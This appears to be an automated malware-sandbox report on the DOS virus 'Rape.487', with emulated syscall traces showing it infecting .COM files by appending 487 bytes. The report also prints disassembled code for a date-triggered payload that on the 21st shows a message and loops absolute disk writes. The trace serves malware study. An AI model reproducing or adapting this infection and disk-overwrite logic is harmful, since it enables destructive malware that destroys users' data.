Sample viewer

vx.netlux.org/Virus.DOS.Rape.487

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:19:44.371528852Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19c 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-17T22:19:44.376016868Z	78	PC: 12ac2 \| Find first file
2018-12-17T22:19:44.382537687Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:19:44.397191582Z	61	PC: 12adf \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:44.406867146Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:19:44.413570356Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:19:44.414945068Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:19:44.416834904Z	62	PC: 12b7e \| Close file
2018-12-17T22:19:44.434137701Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:19:44.444047953Z	79	PC: 12b93 \| Find next file
2018-12-17T22:19:44.447203596Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:19:44.4577225Z	61	PC: 12adf \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:19:44.464416062Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:19:44.470800414Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:19:44.472435269Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:19:44.473797628Z	62	PC: 12b7e \| Close file
2018-12-17T22:19:44.484100867Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:19:44.495781191Z	79	PC: 12b93 \| Find next file
2018-12-17T22:19:44.498500465Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:19:44.50891566Z	61	PC: 12adf \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:19:44.521603773Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:19:44.528010992Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:19:44.529275226Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:19:44.531694007Z	62	PC: 12b7e \| Close file
2018-12-17T22:19:44.539140973Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:19:44.552224297Z	79	PC: 12b93 \| Find next file
2018-12-17T22:19:44.555858788Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:19:44.565485153Z	61	PC: 12adf \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:19:44.572316696Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:19:44.580025828Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:19:44.581285947Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:19:44.582681935Z	62	PC: 12b7e \| Close file
2018-12-17T22:19:44.590663247Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:19:44.601290867Z	79	PC: 12b93 \| Find next file
2018-12-17T22:19:44.604081304Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:19:44.616587301Z	61	PC: 12adf \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:19:44.624020357Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:19:44.630179885Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:19:44.631784457Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:19:44.634212207Z	62	PC: 12b7e \| Close file
2018-12-17T22:19:44.640318274Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:19:44.64667417Z	79	PC: 12b93 \| Find next file
2018-12-17T22:19:44.649686087Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:19:44.656824766Z	61	PC: 12adf \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:19:44.66597686Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:19:44.670673339Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:19:44.671796871Z	64	PC: 12b3a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:19:44.673656609Z	66	PC: 12b44 \| Move file pointer
2018-12-17T22:19:44.675344656Z	64	PC: 12c55 \| Write file or device (Write 487 bytes on handle 5)
2018-12-17T22:19:44.681046001Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:19:44.682634878Z	62	PC: 12b7e \| Close file
2018-12-17T22:19:44.688938692Z	67	PC: 12b8a \| Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3402,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:49:00.118855924Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19c 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-25T11:49:00.121334624Z	78	PC: 12ac2 \| Find first file
2018-12-25T11:49:00.127060765Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-25T11:49:00.571796968Z	61	PC: 12adf \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:00.579157218Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:49:00.58608566Z	66	PC: 12b19 \| Move file pointer
2018-12-25T11:49:00.587341003Z	87	PC: 12b7a \| Get or set file date and time
2018-12-25T11:49:00.589115937Z	62	PC: 12b7e \| Close file
2018-12-25T11:49:00.596017707Z	67	PC: 12b8a \| Get or set file attributes
2018-12-25T11:49:00.606089492Z	79	PC: 12b93 \| Find next file
2018-12-25T11:49:00.608740218Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T11:49:00.618399192Z	61	PC: 12adf \| Open file (See above)
2018-12-25T11:49:00.629881576Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T11:49:00.635954468Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T11:49:00.637328338Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T11:49:00.638635505Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T11:49:00.645521011Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T11:49:00.665616181Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T11:49:00.668125532Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T11:49:00.677738076Z	61	PC: 12adf \| Open file (See above)
2018-12-25T11:49:00.684837437Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T11:49:00.691215109Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T11:49:00.692499777Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T11:49:00.694417311Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T11:49:00.703932661Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T11:49:00.714227778Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T11:49:00.717730718Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T11:49:00.72700544Z	61	PC: 12adf \| Open file (See above)
2018-12-25T11:49:00.733274766Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T11:49:00.740116738Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T11:49:00.741767938Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T11:49:00.743611473Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T11:49:00.751196206Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T11:49:00.763240893Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T11:49:00.769717466Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T11:49:00.779671824Z	61	PC: 12adf \| Open file (See above)
2018-12-25T11:49:00.786281716Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T11:49:00.792353779Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T11:49:00.793758018Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T11:49:00.795145989Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T11:49:00.801944275Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T11:49:00.811439921Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T11:49:00.814458904Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T11:49:00.823898532Z	61	PC: 12adf \| Open file (See above)
2018-12-25T11:49:00.831014967Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T11:49:00.836300699Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T11:49:00.837221007Z	64	PC: 12b3a \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:49:00.838862626Z	66	PC: 12b44 \| Move file pointer
2018-12-25T11:49:00.840416917Z	64	PC: 12c55 \| Write file or device (Write 487 bytes on handle 5)
2018-12-25T11:49:00.845537808Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T11:49:00.846599563Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T11:49:00.851775576Z	67	PC: 12b8a \| Get or set file attributes (See above)

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3402,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:49:00.214623402Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19c 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-25T11:49:00.225605212Z	9	PC: 12a9e \| Display string (String= '486 Virus - (C)1991 RABID, InternationalBy Zodiac - RABID Priest')